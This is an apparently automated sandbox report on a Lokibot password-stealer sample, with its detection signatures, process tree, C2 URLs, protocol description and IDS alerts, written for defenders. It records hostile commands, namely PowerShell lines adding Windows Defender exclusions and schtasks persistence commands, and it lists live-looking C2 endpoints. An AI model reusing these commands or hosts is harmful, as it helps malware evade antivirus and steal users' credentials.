Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kzQ25HVUbf.exe

Overview

General Information

Sample name:kzQ25HVUbf.exe
renamed because original name is a hash value
Original sample name:8097164e911c48c3e99b7676138f793a19fee809d2931090ec7c0c2f65073889.exe
Analysis ID:1589028
MD5:55550b1c9e27a22bc17744fc5cba030c
SHA1:02508be8f94cd14e668d4892028a9a442671817c
SHA256:8097164e911c48c3e99b7676138f793a19fee809d2931090ec7c0c2f65073889
Tags:exeLokiuser-adrian__luca
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Lokibot
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • kzQ25HVUbf.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\kzQ25HVUbf.exe" MD5: 55550B1C9E27A22BC17744FC5CBA030C)
    • powershell.exe (PID: 7812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7868 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7184 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7924 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • kzQ25HVUbf.exe (PID: 8076 cmdline: "C:\Users\user\Desktop\kzQ25HVUbf.exe" MD5: 55550B1C9E27A22BC17744FC5CBA030C)
  • iWEWjTXiqXke.exe (PID: 8176 cmdline: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe MD5: 55550B1C9E27A22BC17744FC5CBA030C)
    • schtasks.exe (PID: 7624 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • iWEWjTXiqXke.exe (PID: 1796 cmdline: "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe" MD5: 55550B1C9E27A22BC17744FC5CBA030C)
    • iWEWjTXiqXke.exe (PID: 616 cmdline: "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe" MD5: 55550B1C9E27A22BC17744FC5CBA030C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x30150:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x1d51b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 39 entries
          SourceRuleDescriptionAuthorStrings
          0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
            0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                Click to see the 37 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kzQ25HVUbf.exe", ParentImage: C:\Users\user\Desktop\kzQ25HVUbf.exe, ParentProcessId: 7568, ParentProcessName: kzQ25HVUbf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", ProcessId: 7812, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kzQ25HVUbf.exe", ParentImage: C:\Users\user\Desktop\kzQ25HVUbf.exe, ParentProcessId: 7568, ParentProcessName: kzQ25HVUbf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", ProcessId: 7812, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe, ParentImage: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe, ParentProcessId: 8176, ParentProcessName: iWEWjTXiqXke.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp", ProcessId: 7624, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\kzQ25HVUbf.exe", ParentImage: C:\Users\user\Desktop\kzQ25HVUbf.exe, ParentProcessId: 7568, ParentProcessName: kzQ25HVUbf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp", ProcessId: 7924, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kzQ25HVUbf.exe", ParentImage: C:\Users\user\Desktop\kzQ25HVUbf.exe, ParentProcessId: 7568, ParentProcessName: kzQ25HVUbf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", ProcessId: 7812, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\kzQ25HVUbf.exe", ParentImage: C:\Users\user\Desktop\kzQ25HVUbf.exe, ParentProcessId: 7568, ParentProcessName: kzQ25HVUbf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp", ProcessId: 7924, ProcessName: schtasks.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T08:37:17.995289+010020243121A Network Trojan was detected192.168.2.94980494.156.177.4180TCP
                2025-01-11T08:37:19.336213+010020243121A Network Trojan was detected192.168.2.94981194.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T08:37:17.283199+010020253811Malware Command and Control Activity Detected192.168.2.94980494.156.177.4180TCP
                2025-01-11T08:37:18.596493+010020253811Malware Command and Control Activity Detected192.168.2.94981194.156.177.4180TCP
                2025-01-11T08:37:19.430625+010020253811Malware Command and Control Activity Detected192.168.2.94981794.156.177.4180TCP
                2025-01-11T08:37:20.295163+010020253811Malware Command and Control Activity Detected192.168.2.94982894.156.177.4180TCP
                2025-01-11T08:37:21.333703+010020253811Malware Command and Control Activity Detected192.168.2.94983494.156.177.4180TCP
                2025-01-11T08:37:22.217012+010020253811Malware Command and Control Activity Detected192.168.2.94984194.156.177.4180TCP
                2025-01-11T08:37:23.102371+010020253811Malware Command and Control Activity Detected192.168.2.94984894.156.177.4180TCP
                2025-01-11T08:37:24.122123+010020253811Malware Command and Control Activity Detected192.168.2.94985494.156.177.4180TCP
                2025-01-11T08:37:25.027858+010020253811Malware Command and Control Activity Detected192.168.2.94986494.156.177.4180TCP
                2025-01-11T08:37:25.900548+010020253811Malware Command and Control Activity Detected192.168.2.94987094.156.177.4180TCP
                2025-01-11T08:37:26.766848+010020253811Malware Command and Control Activity Detected192.168.2.94987694.156.177.4180TCP
                2025-01-11T08:37:27.644318+010020253811Malware Command and Control Activity Detected192.168.2.94988294.156.177.4180TCP
                2025-01-11T08:37:28.555245+010020253811Malware Command and Control Activity Detected192.168.2.94988894.156.177.4180TCP
                2025-01-11T08:37:29.427877+010020253811Malware Command and Control Activity Detected192.168.2.94989594.156.177.4180TCP
                2025-01-11T08:37:30.321553+010020253811Malware Command and Control Activity Detected192.168.2.94990494.156.177.4180TCP
                2025-01-11T08:37:31.243472+010020253811Malware Command and Control Activity Detected192.168.2.94991194.156.177.4180TCP
                2025-01-11T08:37:32.132348+010020253811Malware Command and Control Activity Detected192.168.2.94991794.156.177.4180TCP
                2025-01-11T08:37:33.035370+010020253811Malware Command and Control Activity Detected192.168.2.94992394.156.177.4180TCP
                2025-01-11T08:37:33.901353+010020253811Malware Command and Control Activity Detected192.168.2.94992994.156.177.4180TCP
                2025-01-11T08:37:34.780300+010020253811Malware Command and Control Activity Detected192.168.2.94993894.156.177.4180TCP
                2025-01-11T08:37:35.656565+010020253811Malware Command and Control Activity Detected192.168.2.94994694.156.177.4180TCP
                2025-01-11T08:37:36.542434+010020253811Malware Command and Control Activity Detected192.168.2.94995294.156.177.4180TCP
                2025-01-11T08:37:37.413981+010020253811Malware Command and Control Activity Detected192.168.2.94995894.156.177.4180TCP
                2025-01-11T08:37:38.278632+010020253811Malware Command and Control Activity Detected192.168.2.94996494.156.177.4180TCP
                2025-01-11T08:37:39.298255+010020253811Malware Command and Control Activity Detected192.168.2.94997294.156.177.4180TCP
                2025-01-11T08:37:40.160259+010020253811Malware Command and Control Activity Detected192.168.2.94998094.156.177.4180TCP
                2025-01-11T08:37:41.027625+010020253811Malware Command and Control Activity Detected192.168.2.94998794.156.177.4180TCP
                2025-01-11T08:37:41.877046+010020253811Malware Command and Control Activity Detected192.168.2.94999394.156.177.4180TCP
                2025-01-11T08:37:42.766186+010020253811Malware Command and Control Activity Detected192.168.2.94999994.156.177.4180TCP
                2025-01-11T08:37:43.647766+010020253811Malware Command and Control Activity Detected192.168.2.95000694.156.177.4180TCP
                2025-01-11T08:37:44.509809+010020253811Malware Command and Control Activity Detected192.168.2.95000994.156.177.4180TCP
                2025-01-11T08:37:45.351886+010020253811Malware Command and Control Activity Detected192.168.2.95001094.156.177.4180TCP
                2025-01-11T08:37:46.247938+010020253811Malware Command and Control Activity Detected192.168.2.95001194.156.177.4180TCP
                2025-01-11T08:37:47.141186+010020253811Malware Command and Control Activity Detected192.168.2.95001294.156.177.4180TCP
                2025-01-11T08:37:47.993044+010020253811Malware Command and Control Activity Detected192.168.2.95001394.156.177.4180TCP
                2025-01-11T08:37:48.851758+010020253811Malware Command and Control Activity Detected192.168.2.95001494.156.177.4180TCP
                2025-01-11T08:37:49.710358+010020253811Malware Command and Control Activity Detected192.168.2.95001594.156.177.4180TCP
                2025-01-11T08:37:50.589002+010020253811Malware Command and Control Activity Detected192.168.2.95001694.156.177.4180TCP
                2025-01-11T08:37:51.533742+010020253811Malware Command and Control Activity Detected192.168.2.95001794.156.177.4180TCP
                2025-01-11T08:37:52.420648+010020253811Malware Command and Control Activity Detected192.168.2.95001894.156.177.4180TCP
                2025-01-11T08:37:53.281289+010020253811Malware Command and Control Activity Detected192.168.2.95001994.156.177.4180TCP
                2025-01-11T08:37:54.149795+010020253811Malware Command and Control Activity Detected192.168.2.95002094.156.177.4180TCP
                2025-01-11T08:37:55.447402+010020253811Malware Command and Control Activity Detected192.168.2.95002194.156.177.4180TCP
                2025-01-11T08:37:56.296589+010020253811Malware Command and Control Activity Detected192.168.2.95002294.156.177.4180TCP
                2025-01-11T08:37:57.168024+010020253811Malware Command and Control Activity Detected192.168.2.95002394.156.177.4180TCP
                2025-01-11T08:37:58.108290+010020253811Malware Command and Control Activity Detected192.168.2.95002494.156.177.4180TCP
                2025-01-11T08:37:58.997732+010020253811Malware Command and Control Activity Detected192.168.2.95002594.156.177.4180TCP
                2025-01-11T08:37:59.881352+010020253811Malware Command and Control Activity Detected192.168.2.95002794.156.177.4180TCP
                2025-01-11T08:38:00.923865+010020253811Malware Command and Control Activity Detected192.168.2.95002894.156.177.4180TCP
                2025-01-11T08:38:01.801642+010020253811Malware Command and Control Activity Detected192.168.2.95002994.156.177.4180TCP
                2025-01-11T08:38:02.929554+010020253811Malware Command and Control Activity Detected192.168.2.95003094.156.177.4180TCP
                2025-01-11T08:38:03.788440+010020253811Malware Command and Control Activity Detected192.168.2.95003194.156.177.4180TCP
                2025-01-11T08:38:04.654751+010020253811Malware Command and Control Activity Detected192.168.2.95003294.156.177.4180TCP
                2025-01-11T08:38:05.736766+010020253811Malware Command and Control Activity Detected192.168.2.95003394.156.177.4180TCP
                2025-01-11T08:38:06.637553+010020253811Malware Command and Control Activity Detected192.168.2.95003494.156.177.4180TCP
                2025-01-11T08:38:07.543493+010020253811Malware Command and Control Activity Detected192.168.2.95003594.156.177.4180TCP
                2025-01-11T08:38:08.535138+010020253811Malware Command and Control Activity Detected192.168.2.95003694.156.177.4180TCP
                2025-01-11T08:38:09.430836+010020253811Malware Command and Control Activity Detected192.168.2.95003794.156.177.4180TCP
                2025-01-11T08:38:10.296978+010020253811Malware Command and Control Activity Detected192.168.2.95003894.156.177.4180TCP
                2025-01-11T08:38:11.151744+010020253811Malware Command and Control Activity Detected192.168.2.95003994.156.177.4180TCP
                2025-01-11T08:38:12.040089+010020253811Malware Command and Control Activity Detected192.168.2.95004094.156.177.4180TCP
                2025-01-11T08:38:12.949663+010020253811Malware Command and Control Activity Detected192.168.2.95004194.156.177.4180TCP
                2025-01-11T08:38:13.842179+010020253811Malware Command and Control Activity Detected192.168.2.95004294.156.177.4180TCP
                2025-01-11T08:38:14.714006+010020253811Malware Command and Control Activity Detected192.168.2.95004394.156.177.4180TCP
                2025-01-11T08:38:15.727832+010020253811Malware Command and Control Activity Detected192.168.2.95004494.156.177.4180TCP
                2025-01-11T08:38:16.602139+010020253811Malware Command and Control Activity Detected192.168.2.95004594.156.177.4180TCP
                2025-01-11T08:38:17.480431+010020253811Malware Command and Control Activity Detected192.168.2.95004694.156.177.4180TCP
                2025-01-11T08:38:18.361971+010020253811Malware Command and Control Activity Detected192.168.2.95004794.156.177.4180TCP
                2025-01-11T08:38:19.243600+010020253811Malware Command and Control Activity Detected192.168.2.95004894.156.177.4180TCP
                2025-01-11T08:38:20.125882+010020253811Malware Command and Control Activity Detected192.168.2.95004994.156.177.4180TCP
                2025-01-11T08:38:21.374944+010020253811Malware Command and Control Activity Detected192.168.2.95005094.156.177.4180TCP
                2025-01-11T08:38:22.229791+010020253811Malware Command and Control Activity Detected192.168.2.95005194.156.177.4180TCP
                2025-01-11T08:38:23.088593+010020253811Malware Command and Control Activity Detected192.168.2.95005294.156.177.4180TCP
                2025-01-11T08:38:24.220880+010020253811Malware Command and Control Activity Detected192.168.2.95005394.156.177.4180TCP
                2025-01-11T08:38:25.073323+010020253811Malware Command and Control Activity Detected192.168.2.95005494.156.177.4180TCP
                2025-01-11T08:38:25.957719+010020253811Malware Command and Control Activity Detected192.168.2.95005594.156.177.4180TCP
                2025-01-11T08:38:26.972510+010020253811Malware Command and Control Activity Detected192.168.2.95005694.156.177.4180TCP
                2025-01-11T08:38:27.976208+010020253811Malware Command and Control Activity Detected192.168.2.95005794.156.177.4180TCP
                2025-01-11T08:38:28.837379+010020253811Malware Command and Control Activity Detected192.168.2.95005894.156.177.4180TCP
                2025-01-11T08:38:29.840822+010020253811Malware Command and Control Activity Detected192.168.2.95005994.156.177.4180TCP
                2025-01-11T08:38:30.693073+010020253811Malware Command and Control Activity Detected192.168.2.95006094.156.177.4180TCP
                2025-01-11T08:38:31.577126+010020253811Malware Command and Control Activity Detected192.168.2.95006194.156.177.4180TCP
                2025-01-11T08:38:32.460501+010020253811Malware Command and Control Activity Detected192.168.2.95006294.156.177.4180TCP
                2025-01-11T08:38:33.646503+010020253811Malware Command and Control Activity Detected192.168.2.95006394.156.177.4180TCP
                2025-01-11T08:38:34.530472+010020253811Malware Command and Control Activity Detected192.168.2.95006494.156.177.4180TCP
                2025-01-11T08:38:35.510279+010020253811Malware Command and Control Activity Detected192.168.2.95006594.156.177.4180TCP
                2025-01-11T08:38:36.471295+010020253811Malware Command and Control Activity Detected192.168.2.95006694.156.177.4180TCP
                2025-01-11T08:38:37.336378+010020253811Malware Command and Control Activity Detected192.168.2.95006794.156.177.4180TCP
                2025-01-11T08:38:38.202393+010020253811Malware Command and Control Activity Detected192.168.2.95006894.156.177.4180TCP
                2025-01-11T08:38:39.238877+010020253811Malware Command and Control Activity Detected192.168.2.95006994.156.177.4180TCP
                2025-01-11T08:38:40.130128+010020253811Malware Command and Control Activity Detected192.168.2.95007094.156.177.4180TCP
                2025-01-11T08:38:41.012348+010020253811Malware Command and Control Activity Detected192.168.2.95007194.156.177.4180TCP
                2025-01-11T08:38:41.968094+010020253811Malware Command and Control Activity Detected192.168.2.95007294.156.177.4180TCP
                2025-01-11T08:38:42.823353+010020253811Malware Command and Control Activity Detected192.168.2.95007394.156.177.4180TCP
                2025-01-11T08:38:43.698121+010020253811Malware Command and Control Activity Detected192.168.2.95007494.156.177.4180TCP
                2025-01-11T08:38:44.595801+010020253811Malware Command and Control Activity Detected192.168.2.95007594.156.177.4180TCP
                2025-01-11T08:38:45.627870+010020253811Malware Command and Control Activity Detected192.168.2.95007694.156.177.4180TCP
                2025-01-11T08:38:46.516711+010020253811Malware Command and Control Activity Detected192.168.2.95007794.156.177.4180TCP
                2025-01-11T08:38:47.424671+010020253811Malware Command and Control Activity Detected192.168.2.95007894.156.177.4180TCP
                2025-01-11T08:38:48.273476+010020253811Malware Command and Control Activity Detected192.168.2.95007994.156.177.4180TCP
                2025-01-11T08:38:49.116902+010020253811Malware Command and Control Activity Detected192.168.2.95008094.156.177.4180TCP
                2025-01-11T08:38:49.960016+010020253811Malware Command and Control Activity Detected192.168.2.95008194.156.177.4180TCP
                2025-01-11T08:38:50.825321+010020253811Malware Command and Control Activity Detected192.168.2.95008294.156.177.4180TCP
                2025-01-11T08:38:51.695758+010020253811Malware Command and Control Activity Detected192.168.2.95008394.156.177.4180TCP
                2025-01-11T08:38:52.555444+010020253811Malware Command and Control Activity Detected192.168.2.95008494.156.177.4180TCP
                2025-01-11T08:38:53.414347+010020253811Malware Command and Control Activity Detected192.168.2.95008594.156.177.4180TCP
                2025-01-11T08:38:54.273813+010020253811Malware Command and Control Activity Detected192.168.2.95008694.156.177.4180TCP
                2025-01-11T08:38:55.134435+010020253811Malware Command and Control Activity Detected192.168.2.95008794.156.177.4180TCP
                2025-01-11T08:38:56.036472+010020253811Malware Command and Control Activity Detected192.168.2.95008894.156.177.4180TCP
                2025-01-11T08:38:56.987645+010020253811Malware Command and Control Activity Detected192.168.2.95008994.156.177.4180TCP
                2025-01-11T08:38:57.870196+010020253811Malware Command and Control Activity Detected192.168.2.95009094.156.177.4180TCP
                2025-01-11T08:38:58.710492+010020253811Malware Command and Control Activity Detected192.168.2.95009194.156.177.4180TCP
